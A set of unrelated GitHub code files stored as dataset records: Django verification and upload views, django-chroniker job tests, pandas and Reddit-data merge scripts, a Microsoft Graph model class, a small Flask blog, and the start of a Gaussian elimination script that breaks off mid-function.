pending = Client.objects.filter(client_id = request.user.id ,is_requested = 1,is_approved = 0,is_rejected = 0)\n approved = Client.objects.filter(client_id = request.user.id ,is_requested = 1,is_approved = 1,is_rejected = 0)\n context = {\n 'pending': pending,\n 'approved': approved,\n 'company':company\n }\n return render(request, 'verification/verification-client.html',context)\n\n\n@login_required(login_url = 'login')\ndef approveclient(request,id):\n approve = Client.objects.get(id = id)\n approve.is_approved = 1\n approve.save()\n return redirect('verifyclient')\n\n@login_required(login_url = 'login')\ndef deleteclient(request,id):\n dele = Client.objects.get(id = id)\n dele.is_rejected = 1\n dele.save()\n return redirect('verifyclient')\n\n@login_required(login_url = 'login')\ndef editverificationclient(request,id):\n cli = Client.objects.get(id = id)\n\n if request.method == \"POST\":\n\n # Cliid = request.POST.get('client-name')\n Cliimage = request.FILES.get('clientimage')\n Clidesc = request.POST.get('client_description')\n\n \n cli.client_description = Clidesc\n if Cliimage:\n\n\n\n cli.clientimage = Cliimage\n else:\n pass\n cli.save()\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n@login_required(login_url = 'login')\ndef sendverclient(request,id):\n sendreq = Client.objects.get(id = id)\n sendreq.is_requested = 1\n sendreq.save()\n \n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n#####################TESTIMONIAL Verification ######################################\n\n@login_required(login_url = 'login')\ndef verifytestimonial(request):\n company = request.user.groups.filter(name='COMPANY').exists()\n pending = Testimonial.objects.filter(testuser_id=request.user.id,is_requested = 1, is_approved=0,is_rejected = 0)\n approved = Testimonial.objects.filter(testuser_id=request.user.id,is_requested = 1, is_approved=1,is_rejected = 0)\n context = {\n 'pending': pending,\n 'approved': approved,\n 'company':company,\n }\n return render(request, 'verification/verification-testimonial.html',context)\n\n\n@login_required(login_url = 'login')\ndef approvetestimonial(request,id):\n approve = Testimonial.objects.get(id = id)\n approve.is_approved = 1\n approve.save()\n return redirect('verifytestimonial')\n\n@login_required(login_url = 'login')\ndef deletetestimonial(request,id):\n dele = Testimonial.objects.get(id = id)\n dele.is_rejected = 1\n dele.save()\n return redirect('verifytestimonial')\n\n@login_required(login_url = 'login')\ndef editverificationtestimonial(request,id):\n testi = Testimonial.objects.get(id = id)\n\n if request.method == \"POST\":\n TestImg = request.FILES.get('testimonial_image')\n Testdesc = request.POST.get('testimonial_description')\n\n testi.testimonial_description = Testdesc\n\n \n\n if TestImg:\n testi.testimonial_image = TestImg\n else:\n pass\n testi.save()\n\n\n\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n@login_required(login_url = 'login')\ndef sendvertestimonial(request,id):\n \n sendreq = Testimonial.objects.get(id = id)\n sendreq.is_requested = 1\n sendreq.save()\n \n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n###########################verify achievement######################\n\n@login_required(login_url = 'login')\ndef verifyachievements(request):\n company = request.user.groups.filter(name='COMPANY').exists()\n pending = Achievements.objects.filter(auth_id= request.user.id,is_requested = 1, is_approved=0,is_rejected = 0)\n approved = Achievements.objects.filter(auth_id= request.user.id,is_requested = 1, is_approved=1,is_rejected = 0)\n \n \n context = {\n 'pending': pending,\n 'approved': approved,\n 'company':company,\n }\n return render(request, 'verification/verification-achievements.html',context)\n\n@login_required(login_url = 'login')\ndef approveachievements(request,id):\n approve = Achievements.objects.get(id = id)\n approve.is_approved = 1\n approve.save()\n return redirect('verifyachievements')\n\n@login_required(login_url = 'login')\ndef deleteachievements(request,id):\n dele = Achievements.objects.get(id = id)\n dele.is_rejected = 1\n dele.save()\n return redirect('verifytestimonial')\n\n@login_required(login_url = 'login')\ndef editverificationachievements(request,id):\n testi = Achievements.objects.get(id = id)\n\n if request.method == \"POST\":\n # TestImg = request.FILES.get('testimonial_image')\n Achtitle = request.POST.get('achtitle')\n AchDesc = request.POST.get('achdesc')\n\n testi.title = Achtitle\n testi.description = AchDesc\n\n \n\n # if TestImg:\n # testi.testimonial_image = TestImg\n # else:\n # pass\n testi.save()\n\n\n\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n@login_required(login_url = 'login')\ndef sendverachievements(request,id):\n \n sendreq = Achievements.objects.get(id = id)\n sendreq.is_requested = 1\n sendreq.save()\n \n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n#########################verify expertise###########################\n\n@login_required(login_url = 'login')\ndef verifyexpertise(request):\n company = request.user.groups.filter(name='COMPANY').exists()\n pending = Expertise.objects.filter(auth_id=request.user.id,is_requested = 1, is_approved=0,is_rejected = 0)\n approved = Expertise.objects.filter(auth_id=request.user.id,is_requested = 1, is_approved=1,is_rejected = 0)\n \n\n context = {\n 'pending': pending,\n 'approved': approved,\n 'company':company,\n }\n return render(request, 'verification/verification-expertise.html',context)\n\n@login_required(login_url = 'login')\ndef approveexpertise(request,id):\n approve = Expertise.objects.get(id = id)\n approve.is_approved = 1\n approve.save()\n return redirect('verifyexpertise')\n\n@login_required(login_url = 'login')\ndef deleteexpertise(request,id):\n dele = Expertise.objects.get(id = id)\n dele.is_rejected = 1\n dele.save()\n return redirect('verifyexpertise')\n\n@login_required(login_url = 'login')\ndef editverificationexpertise(request,id):\n testi = Expertise.objects.get(id = id)\n\n if request.method == \"POST\":\n exprofession = request.POST.get('exprofession')\n expexpertisein = request.POST.get('expexpertisein')\n expyears = request.POST.get('expyears')\n expdescription = request.POST.get('expdescription')\n \n \n testi.profession = exprofession\n testi.expertisein = expexpertisein\n testi.years = expyears\n testi.description = expdescription\n \n testi.save()\n\n\n\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n@login_required(login_url = 'login')\ndef sendverexpertise(request,id):\n \n sendreq = Expertise.objects.get(id = id)\n sendreq.is_requested = 1\n sendreq.save()\n \n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n#########################verify projects##########################\n\n@login_required(login_url = 'login')\ndef verifyprojects(request):\n company = request.user.groups.filter(name='COMPANY').exists()\n pending = Projects.objects.filter(auth_id=request.user.id,is_requested = 1, is_approved=0,is_rejected = 0)\n approved = Projects.objects.filter(auth_id=request.user.id,is_requested = 1, is_approved=1,is_rejected = 0)\n \n context = {\n 'pending': pending,\n 'approved': approved,\n 'company':company,\n }\n return render(request, 'verification/verification-projectsproducts.html',context)\n\n@login_required(login_url = 'login')\ndef approveprojects(request,id):\n approve = Projects.objects.get(id = id)\n approve.is_approved = 1\n approve.save()\n return redirect('verifyprojects')\n\n@login_required(login_url = 'login')\ndef deleteprojects(request,id):\n dele = Projects.objects.get(id = id)\n dele.is_rejected = 1\n dele.save()\n return redirect('verifyprojects')\n\n@login_required(login_url = 'login')\ndef editverificationprojects(request,id):\n testi = Projects.objects.get(id = id)\n\n if request.method == \"POST\":\n \n projectname = request.POST.get('projectname')\n\n testi.project_name = projectname\n testi.save()\n\n\n\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n@login_required(login_url = 'login')\ndef sendverprojects(request,id):\n sendreq = Projects.objects.get(id = id)\n sendreq.is_requested = 1\n sendreq.save()\n \n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n##########################verify experience ##############\n\n@login_required(login_url = 'login')\ndef verifyexperience(request):\n company = request.user.groups.filter(name='COMPANY').exists()\n pending = Experience.objects.filter(company_id=request.user.id,is_requested = 1, is_approved=0,is_rejected = 0)\n approved = Experience.objects.filter(company_id=request.user.id,is_requested = 1, is_approved=1,is_rejected = 0)\n\n context = {\n 'pending': pending,\n 'approved': approved,\n 'company':company,\n }\n return render(request, 'verification/verification-experience.html',context)\n\n@login_required(login_url = 'login')\ndef approveexperience(request,id):\n approve = Experience.objects.get(id = id)\n approve.is_approved = 1\n approve.save()\n return redirect('verifyexperience')\n\n@login_required(login_url = 'login')\ndef deleteexperience(request,id):\n dele = Experience.objects.get(id = id)\n dele.is_rejected = 1\n dele.save()\n return redirect('verifyexperience')\n\n@login_required(login_url = 'login')\ndef editverificationexperience(request,id):\n testi = Experience.objects.get(id = id)\n\n if request.method == \"POST\":\n fromyear = request.POST.get('fromyear')\n toyear = request.POST.get('toyear')\n \n \n exp_keywords = request.POST.get('exp_keywords')\n expdetail = request.POST.get('exp_detail')\n comments = request.POST.get('comments')\n responsibility = request.POST.get('responsibility')\n \n testi.fromyear = fromyear\n testi.toyear = toyear\n testi.exp_keywords = exp_keywords\n testi.exp_detail = expdetail\n testi.comments = comments\n testi.responsibily = responsibility\n\n testi.save()\n\n\n\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n@login_required(login_url = 'login')\ndef sendverxperience(request,id):\n \n sendrequ = Experience.objects.get(id = id)\n sendrequ.is_requested = 1\n sendrequ.save()\n \n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n############################SHARE####################\n\n@login_required(login_url = 'login')\ndef share(request):\n\n broushers = Brousher.objects.filter(user_id = request.user.id)\n cards = Cards.objects.filter( user_id = request.user.id )\n images = Image.objects.filter(user_id = request.user.id)\n\n try:\n bioview = Bio.objects.get(user_id = request.user.id)\n except:\n bioview =\"\"\n\n context = {\n 'bioview':bioview,\n 'broushers':broushers,\n 'cards':cards,\n 'images':images,\n }\n return render(request,'share/share.html',context)\n\n@login_required(login_url = 'login')\ndef addbrousher(request):\n\n if request.method == \"POST\":\n Brousherimage = request.FILES.get('file')\n brousher = Brousher()\n brousher.brousher = Brousherimage\n brousher.user_id = request.user.id\n brousher.save()\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n@login_required(login_url = 'login')\ndef addcard(request):\n if request.method == \"POST\":\n Cardimg = request.FILES.get('file')\n cards = Cards()\n cards.card = Cardimg\n cards.user_id = request.user.id\n cards.save()\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n@login_required(login_url = 'login')\ndef addimage(request):\n if request.method == \"POST\":\n Img = request.FILES.get('file')\n img = Image()\n img.image = Img\n img.user_id = request.user.id\n img.save()\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n@login_required(login_url = 'login')\ndef adddocs(request):\n if request.method == \"POST\":\n DOC = request.FILES.get('file')\n doc = Documents()\n doc.DOCS = DOC\n doc.user_id = request.user.id\n doc.save()\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n\ndef postreport(request):\n postitems = Post.objects.all()\n print(postitems)\n context = {\n 'postitems':postitems,\n }\n return render(request,'panel/postreport.html',context)\n\n\n\n\n#################jquery company name autocomplete####################\n\n\n# def company_autocomplete(request):\n# if 'term' in request.GET:\n# qs = UserExtend.objects.filter(company_name__istartswith = request.GET.get('term'))\n# names = []\n#\n# for company in qs:\n# names.append(company.company_name)\n# return JsonResponse(names,safe = False)\n# return render(request,'profile/profile-user-edit.html')\n\n\ndef company_autocomplete(request):\n if 'term' in request.GET:\n qs = UserExtend.objects.filter(company_name__istartswith = request.GET.get('term'))\n names = []\n\n for company in qs:\n names.append({'label':company.company_name, 'value':company.user_id})\n return HttpResponse(json.dumps(names), content_type='application/json')\n # return render(request,'profile/profile-user-edit.html')\n\ndef client_autocomplete(request):\n if 'term' in request.GET:\n qs = CustomUser.objects.filter(email__istartswith = request.GET.get('term'))\n # qsc = UserExtend.objects.filter(company_name__istartswith = request.GET.get('term'))\n \n names = []\n\n for company in qs:\n #pofilepics = json.dumps(str(company.bio.image))\n \n p = company.bio.address \n fn = company.first_name \n ln = company.last_name \n print(p)\n \n if ln == None:\n ln = ''\n else:\n ln = ln\n \n if p == None :\n \n p = ''\n else:\n p = p\n \n print(p)\n print(fn,ln)\n \n name = fn + ' ' + ln + ' ' + p\n \n \n \n names.append({'label':name , 'value':company.id, 'descr':company.last_name, 'img':name})\n \n \n # for company in qsc:\n # names.append({'label':company.descripcion, 'value':company.user_id})\n \n\n return HttpResponse(json.dumps(names), content_type='application/json')\n \n \n \ndef search_auto(request):\n if request.is_ajax(): \n q = request.GET.get('term', '')\n uname = CustomUser.objects.filter(first_name__istartswith = q) \n results = []\n for u in uname:\n user_json = {'value':0, 'image':0, 'label':0}\n user_json['value'] = u.id\n user_json['label'] = u.first_name\n user_json['img'] = u.picture \n results.append(user_json)\n \n data = json.dumps(results)\n else:\n data = 'fail'\n mimetype = 'application/json'\n return HttpResponse(data, mimetype)\n\n # return JsonResponse(names,safe = False)\n # return render(request, 'profile/profile-user-edit.html')\n\n\n # def __str__(self):\n # return 'Comment by {} on {}'.format(self.name, self.post)\n\n\n# Download SLides","repo_name":"BlueSapphireTek/kaarmy","sub_path":"social/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":73248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20158777432","text":"import datetime\nimport time\n\nfrom django.core.management import _commands, call_command\nfrom django.test import TestCase\n\nfrom chroniker.models import Job, Log#, freqs\nfrom chroniker.tests.commands import Sleeper\n\n#try:\n# from django.utils import unittest\n#except:\n# import unittest\n\nclass JobTestCase(TestCase):\n \n fixtures = ['test_jobs.json']\n \n def setUp(self):\n # Install the test command; this little trick installs the command\n # so that we can refer to it by name\n _commands['test_sleeper'] = Sleeper()\n \n def testJobRun(self):\n \"\"\"\n Test that the jobs run properly.\n \"\"\"\n self.assertEqual(Job.objects.all().count(), 4)\n \n for job in Job.objects.due():\n time_expected = float(job.args)\n \n time_start = time.time()\n #TODO:heartbeat thread can't access sqlite3 models?\n #Throws \"DatabaseError: no such table: chroniker_job\".\n #Causes django-admin.py to consume 100% cpu?\n job.run(update_heartbeat=0)\n time_end = time.time()\n \n time_taken = time_end - time_start\n self.assertAlmostEqual(time_taken, time_expected, delta=4)\n \n def testCronCommand(self):\n \"\"\"\n Test that the ``cron`` command runs all jobs in parallel.\n \"\"\"\n \n # Pick the longest running Job\n job = sorted(Job.objects.due().filter(command=\"test_sleeper\"), key=lambda j: -int(j.args))[0]\n \n # The \"args\" property simply describes the number of seconds the Job\n # should take to run\n time_expected = float(job.args)\n \n time_start = time.time()\n #call_command('cron', update_heartbeat=0)\n call_command('run_job', job.id, update_heartbeat=0)\n time_end = time.time()\n \n time_taken = time_end - time_start\n self.assertAlmostEqual(time_taken, time_expected, delta=3.5)\n \n def testCronCleanCommand(self):\n \"\"\"\n Test that the ``cron_clean`` command runs properly.\n \"\"\"\n # Pick the shortest running Job\n job = sorted(Job.objects.due().filter(command=\"test_sleeper\"), key=lambda j: int(j.args))[0]\n \n # Run the job 5 times\n for i in range(5):\n job.run(update_heartbeat=0)\n \n # Ensure that we have 5 Log objects\n self.assertEqual(Log.objects.count(), 1)\n \n # Now clean out the logs that are older than 0 minutes (all of them)\n #call_command('cron_clean', 'minutes', '0')\n Log.cleanup()\n \n # Ensure that we have 0 Log objects\n self.assertEqual(Log.objects.count(), 0)\n \n def testDependencies(self):\n \"\"\"\n Confirm inter-job dependencies are detected.\n \"\"\"\n \n due = list(Job.objects.due_with_met_dependencies())\n #print 'due:', due\n self.assertEqual(\n due,\n [Job.objects.get(args=\"1\"), Job.objects.get(args=\"10\")])\n \n # Note, possible bug? call_command() causes all models\n # changes made within the command to be lost.\n # e.g. Even though it appears to correctly run the job,\n # querying the job's next_run date will show the old original date.\n # As a workaround for testing, we just run them all directly.\n #call_command('cron', update_heartbeat=0)\n for job in due:\n job.run(update_heartbeat=0)\n \n #Job.objects.update()\n due = list(Job.objects.due_with_met_dependencies())\n #print 'due:', due\n self.assertEqual(due, [Job.objects.get(args=\"5\")])\n \n for job in due:\n job.run(update_heartbeat=0)\n \n due = list(Job.objects.due_with_met_dependencies())\n #print 'due:', due\n self.assertEqual(due, [Job.objects.get(args=\"2\")])\n ","repo_name":"ryanflores79/virtualenvs","sub_path":"bitstak/lib/python2.7/site-packages/chroniker/tests/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37330395279","text":"#! /usr/bin/env python3\n\nimport logging\nimport os\nfrom time import localtime, strftime\n\nimport pandas as pd\n\nimport config as cfg\n\nlogger = logging.getLogger(__name__)\n\n\ndef pandas_merge(date, diva_csv, gor_csv):\n \"\"\"\n Creates a merged CSV from Oracle DBs of the Gorilla MAM and DivaArchive.\n The merge is performed by converting the CSVs to pandas dataframes and using a common key.\n \"\"\"\n\n config = cfg.get_config()\n root_path = config[\"paths\"][\"root_path\"]\n csv_path = config[\"paths\"][\"csv_path\"]\n\n try:\n os.chdir(csv_path)\n\n gor_source = str(gor_csv)\n div_source = str(diva_csv)\n\n gor_reader = pd.read_csv(gor_source)\n div_reader = pd.read_csv(div_source)\n\n merged_csv = date + \"_\" + \"gor_diva_merged_export.csv\"\n\n merge_1_msg = f\"START GORILLA-DIVA DB MERGE\"\n logger.info(merge_1_msg)\n\n with open(merged_csv, mode=\"w+\", encoding=\"utf-8-sig\") as m_csv:\n\n merged_df = gor_reader.merge(div_reader, on=\"GUID\")\n\n merged_df = pd.merge(\n gor_reader,\n div_reader,\n left_on=[\"GUID\"],\n right_on=[\"GUID\"],\n how=\"outer\",\n indicator=True,\n )\n\n left_count = merged_df.loc[\n merged_df._merge == \"left_only\", \"_merge\"\n ].count()\n\n right_count = merged_df.loc[\n merged_df._merge == \"right_only\", \"_merge\"\n ].count()\n\n both_count = merged_df.loc[merged_df._merge == \"both\", \"_merge\"].count()\n\n merged_df.to_csv(m_csv, mode=\"a\", index=False, header=True)\n\n # m_count = merged_df.shape[0]\n # merged_dd = merged.drop_duplicates(subset=\"GUID\", inplace=True)\n # dd_count = merged_dd.shape[0]\n # merged_dd.to_csv(m_csv, mode='a', index=False, header=True)\n\n m_csv.close()\n\n merge_2_msg = f\"\\n\\\n ==================================================================\\n\\\n Gor-DIVA DB MERGE Complete \\n\\\n {str(strftime('%A, %d. %B %Y %I:%M%p', localtime()))} \\n\\\n Rows Merged: {str(both_count)}\\n\\\n Unmerged Gorilla Objects: {str(left_count)}\\n\\\n Unmerged Diva Objects: {str(right_count)}\\n\\\n ==================================================================\\\n \"\n\n logger.info(merge_2_msg)\n\n os.chdir(root_path)\n\n return merged_csv\n\n except Exception as e:\n db_merge_excp_msg = f\"\\n\\\n Exception raised on the Gor-Diva DB Merge.\\n\\\n Error Message: {str(e)} \\n\\\n \"\n\n logger.exception(db_merge_excp_msg)\n\n print(db_merge_excp_msg)\n\n\n# if __name__ == '__main__':\n# pandas_merge()\n","repo_name":"scuc/Media-Asset-Migration","sub_path":"merge_dbs.py","file_name":"merge_dbs.py","file_ext":"py","file_size_in_byte":2819,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"41608888605","text":"import os\nimport pandas as pd \nimport argparse as arg\nimport sys\nimport datetime\nimport csv\nfrom itertools import chain\n\nabspath = os.path.abspath(__file__)\ndname = os.path.dirname(abspath)\nos.chdir(dname)\n\nparser = arg.ArgumentParser()\nparser.add_argument('job', type=str, help='type of job to run, either Merge or Identify')\nparser.add_argument('subreddits', type=str, help='csv list of subreddits to pull')\nparser.add_argument('ptype', type=str, help='either Submissions or Comments')\n\nargs = parser.parse_args(sys.argv[1:])\n\n# get files in directory and create list of files\ndef get_files(dir):\n files = []\n for file in os.listdir(dir):\n if file.endswith(\".pickle\") and os.path.getsize(os.path.join(dir, file)) > 459:\n files.append(os.path.join(dir, file))\n return files.sort()\n\n\ndef identify_missing_files(dir, files):\n missing_files = []\n for file in files:\n if not os.path.exists(os.path.join(dir, file)) or os.path.getsize(os.path.join(dir, file)) <= 459:\n missing_files.append(file)\n return missing_files\n\n\ndef splittimeframe(subreddit, start, end, split): # splits the time into a series of smaller files to pull\n split_list = []\n step = (end - start) / split\n for i in range(split):\n s = int(start + i * step)\n e = int((start + (i + 1) * step) - 1)\n if i == split - 1:\n e += 86400\n split_list.append(f'{subreddit}-{s}.pickle')\n\n return split_list\n\ndef find_existing_pulls(type, subreddits): #remove existing pulls from subreddits list\n done = os.listdir(f'../../Files/{type}/score/')\n done.extend(os.listdir(f'../../Files/{type}/'))\n for i in done:\n done[done.index(i)] = i[:-7]\n res = [i for i in subreddits if i not in done]\n return res\n\ndef merge_splits(files, subreddit, ptype): # merges the files down\n merge_candidates = []\n for file in files:\n try:\n if os.path.getsize(f'../../Files/{ptype}/temp/{file}') > 459:\n if file[:-18] == subreddit:\n merge_candidates.append(f'../../Files/{ptype}/temp/{file}')\n except FileNotFoundError:\n pass\n\n merge_candidates.sort()\n if len(merge_candidates) == 24:\n df = pd.concat([pd.read_pickle(candidate) for candidate in merge_candidates])\n df.to_pickle(f'../../Files/{ptype}/{subreddit}.pickle')\n print(f'{subreddit} merged')\n for i in merge_candidates:\n os.remove(i)\n else:\n print(f'{subreddit} has only {len(merge_candidates)} files to merge. Merging not possible.')\n\nwith open(args.subreddits, newline='') as f:\n reader = csv.reader(f)\n subreddits = list(reader)\n\nsubreddits = list(chain.from_iterable(subreddits))\n\nif args.job == 'Identify':\n subreddits_not_completed = find_existing_pulls(args.ptype, subreddits)\n\n start = int(datetime.datetime(2020, 3, 1).timestamp())\n end = int(datetime.datetime(2022, 3, 31).timestamp())\n split = 24\n missing_parts = []\n for subreddit in subreddits_not_completed:\n \n subreddit_parts = splittimeframe(subreddit, start, end, split)\n missing = identify_missing_files(f'../../Files/{args.ptype}/temp/', subreddit_parts)\n for m in missing:\n missing_parts.append(m)\n\n\n file = open(f'../../Files/{args.ptype}/temp/missing.csv', \"w\")\n writer = csv.writer(file, delimiter = \"\\n\")\n for list_ in missing_parts:\n writer.writerow([list_])\n file.close()\n\nif args.job == 'Merge':\n files = []\n files = os.listdir(f'../../Files/{args.ptype}/temp/')\n files.pop(files.index('missing.csv'))\n\n t = [file[:-18] for file in files]\n\n subreddits = []\n for i in t:\n if i not in subreddits:\n subreddits.append(i)\n\n for subreddit in subreddits:\n merge_splits(files, subreddit, args.ptype)\n \n\n\n\n\n","repo_name":"jvschlierf/networkthesis","sub_path":"Preprocessing/merge_distr_subs.py","file_name":"merge_distr_subs.py","file_ext":"py","file_size_in_byte":3878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15799175198","text":"from __future__ import annotations\nimport datetime\nfrom dataclasses import dataclass, field\nfrom kiota_abstractions.serialization import AdditionalDataHolder, Parsable, ParseNode, SerializationWriter\nfrom kiota_abstractions.store import BackedModel, BackingStore, BackingStoreFactorySingleton\nfrom typing import Any, Callable, Dict, List, Optional, TYPE_CHECKING, Union\n\nif TYPE_CHECKING:\n from .item_body import ItemBody\n from .post_type import PostType\n\n@dataclass\nclass ServiceHealthIssuePost(AdditionalDataHolder, BackedModel, Parsable):\n # Stores model information.\n backing_store: BackingStore = field(default_factory=BackingStoreFactorySingleton(backing_store_factory=None).backing_store_factory.create_backing_store, repr=False)\n\n # Stores additional data not described in the OpenAPI description found when deserializing. Can be used for serialization as well.\n additional_data: Dict[str, Any] = field(default_factory=dict)\n # The published time of the post.\n created_date_time: Optional[datetime.datetime] = None\n # The content of the service issue post. The supported value for the contentType property is html.\n description: Optional[ItemBody] = None\n # The OdataType property\n odata_type: Optional[str] = None\n # The post type of the service issue historical post. Possible values are: regular, quick, strategic, unknownFutureValue.\n post_type: Optional[PostType] = None\n \n @staticmethod\n def create_from_discriminator_value(parse_node: Optional[ParseNode] = None) -> ServiceHealthIssuePost:\n \"\"\"\n Creates a new instance of the appropriate class based on discriminator value\n param parse_node: The parse node to use to read the discriminator value and create the object\n Returns: ServiceHealthIssuePost\n \"\"\"\n if not parse_node:\n raise TypeError(\"parse_node cannot be null.\")\n return ServiceHealthIssuePost()\n \n def get_field_deserializers(self,) -> Dict[str, Callable[[ParseNode], None]]:\n \"\"\"\n The deserialization information for the current model\n Returns: Dict[str, Callable[[ParseNode], None]]\n \"\"\"\n from .item_body import ItemBody\n from .post_type import PostType\n\n from .item_body import ItemBody\n from .post_type import PostType\n\n fields: Dict[str, Callable[[Any], None]] = {\n \"createdDateTime\": lambda n : setattr(self, 'created_date_time', n.get_datetime_value()),\n \"description\": lambda n : setattr(self, 'description', n.get_object_value(ItemBody)),\n \"@odata.type\": lambda n : setattr(self, 'odata_type', n.get_str_value()),\n \"postType\": lambda n : setattr(self, 'post_type', n.get_enum_value(PostType)),\n }\n return fields\n \n def serialize(self,writer: SerializationWriter) -> None:\n \"\"\"\n Serializes information the current object\n param writer: Serialization writer to use to serialize this model\n Returns: None\n \"\"\"\n if not writer:\n raise TypeError(\"writer cannot be null.\")\n writer.write_datetime_value(\"createdDateTime\", self.created_date_time)\n writer.write_object_value(\"description\", self.description)\n writer.write_str_value(\"@odata.type\", self.odata_type)\n writer.write_enum_value(\"postType\", self.post_type)\n writer.write_additional_data_value(self.additional_data)\n \n\n","repo_name":"microsoftgraph/msgraph-sdk-python","sub_path":"msgraph/generated/models/service_health_issue_post.py","file_name":"service_health_issue_post.py","file_ext":"py","file_size_in_byte":3438,"program_lang":"python","lang":"en","doc_type":"code","stars":186,"dataset":"github-code","pt":"37"} +{"seq_id":"17874631179","text":"#!/usr/bin/python\r\n# -*- coding: utf-8 -*-\r\nfrom flask import Flask, render_template\r\nimport psycopg2\r\nfrom config import config\r\n\r\napp = Flask(__name__)\r\n\r\n\r\n@app.route(\"/\")\r\ndef dump_entries():\r\n params = config()\r\n db = psycopg2.connect(**params)\r\n cursor = db.cursor()\r\n cursor.execute(\"select id, date, title, content from entries order by date\")\r\n rows = cursor.fetchall()\r\n output = \"\"\r\n for r in rows:\r\n #debug(str(dict(r)))\r\n output += str(r)\r\n output += \"\\n\"\r\n return \"
    \" + output + \"
    \"\r\n\r\n\r\n@app.route(\"/browse\")\r\ndef browse():\r\n params = config()\r\n db = psycopg2.connect(**params)\r\n cursor = db.cursor()\r\n cursor.execute(\"select id, date, title, content from entries order by date\")\r\n rowlist = cursor.fetchall()\r\n print(rowlist)\r\n return render_template(\"browse.html\", entries=rowlist)\r\n\r\nif __name__ == \"__main__\":\r\n app.run()\r\n","repo_name":"volodbol/obdz-lab3","sub_path":"blog/blog.py","file_name":"blog.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33857459863","text":"import sys\n\ninput = sys.stdin.read()\nnumbers = input.split()\nnumber_i = 0\n\ndef get_num():\n\tglobal number_i\n\tvalue = int(numbers[number_i])\n\tnumber_i = number_i + 1\n\treturn value\n\nrows = get_num()\ncols = get_num()\n\nmatrix = []\nright = rows * [0]\n\nfor row in range(0, rows):\n\tmatrix.append([])\n\tfor col in range(0, cols):\n\t\tmatrix[row].append(get_num())\n\tright[row] = get_num()\n\ndef stringify_matrix(m, r, prec):\n\tdef format_num(n, prec):\n\t\treturn ('{0:.' + str(prec) + 'f}').format(n)\n\tdef calc_num_width(n, prec):\n\t\treturn len(format_num(n, prec))\n\tdef calc_row_width(ns, prec):\n\t\tw = 0 \n\t\tfor i in range(0, len(ns)):\n\t\t\twi = calc_num_width(ns[i], prec)\n\t\t\tif wi > w:\n\t\t\t\tw = wi\n\t\treturn w\n\tdef calc_matrix_width(m, prec):\n\t\tw = 0\n\t\tfor row in range(0, len(m)):\n\t\t\tw_row = calc_row_width(m[row], prec)\n\t\t\tif w_row > w:\n\t\t\t\tw = row\n\t\treturn w\n\tw = calc_matrix_width(m, prec)\n\trw = calc_row_width(r, prec)\n\t#print([1111111, m, r, prec, w, rw])\n\tdef str_num(n, prec, w):\n\t\t#print(['str_num', n, prec, w])\n\t\ts = format_num(n, prec)\n\t\tpadding = ' ' * (w - len(s))\n\t\treturn padding + s\n\tdef str_row(row, prec, w, r, w_r):\n\t\t#print(['str_row', row, prec, w, r, w_r])\n\t\ts = ''\n\t\tfor i in range(0, len(row)):\n\t\t\tif i != 0:\n\t\t\t\ts = s + ' '\n\t\t\ts = s + str_num(row[i], prec, w)\n\t\ts = s + ' | ' + str_num(r, prec, w_r)\t\n\t\treturn s\n\ts = ''\n\tfor i in range (0, len(m)):\n\t\ts = s + str_row(m[i], prec, w, r[i], rw) + '\\n'\n\treturn s\n\t\n#print(stringify_matrix(matrix, right, 1))\n#print(stringify_matrix(matrix, right, 2))\n#print(stringify_matrix(matrix, right, 3))\n#print(stringify_matrix(matrix, right, 4))\n#print(stringify_matrix(matrix, right, 0))\n#exit()\n\n# return row of first nonzero element starting with matrix[n][n] and down\n# or return -1\ndef find_nonzero(matrix, r, c):\n\tfor row in range(r, len(matrix)):\n\t\tif matrix[row][c] != 0:\n\t\t\treturn row\n\treturn -1\n\n# swap matrixes and right parts rows\t\ndef swap_rows(matrix, right, r1, r2):\n\trow1 = matrix[r1]\n\tmatrix[r1] = matrix[r2]\n\tmatrix[r2] = row1\n\trow1 = right[r1]\n\tright[r1] = right[r2]\n\tright[r2] = row1\n\n# leave non-zero matrix[n][n] or make it swapping two lines\n# return False if it has only zeros\n# that means infinite solutions\ndef make_nonzero_base(matrix, right, r, c):\n\tnonzero_row = find_nonzero(matrix, r, c)\n\tif nonzero_row < 0:\n\t\treturn False\n\tif nonzero_row != r:\n\t\tswap_rows(matrix, right, nonzero_row, r)\n\treturn True\n\t\t\n#make_nonzero_base(matrix, 1)\n#print(matrix)\n#exit()\n\n# return False for infinite solutions\ndef rid_of_col(matrix, right, r, c):\n\tif not make_nonzero_base(matrix, right, r, c):\n\t\treturn False\n\tbase = matrix[r][c]\n\tfor row in range(r + 1, len(matrix)):\n\t\tmul = matrix[row][c] / base\n\t\tfor col in range(c, len(matrix[row])):\n\t\t\tmatrix[row][col] = matrix[row][col] - matrix[r][col] * mul\n\t\tright[row] = right[row] - right[r] * mul\n\treturn True\n\n\n# return for infinite solutions\ndef make_triangle(matrix, cols, right):\t\n\trow = 0\n\tfor n in range(0, cols):\n\t\t#print(stringify_matrix(matrix, right, 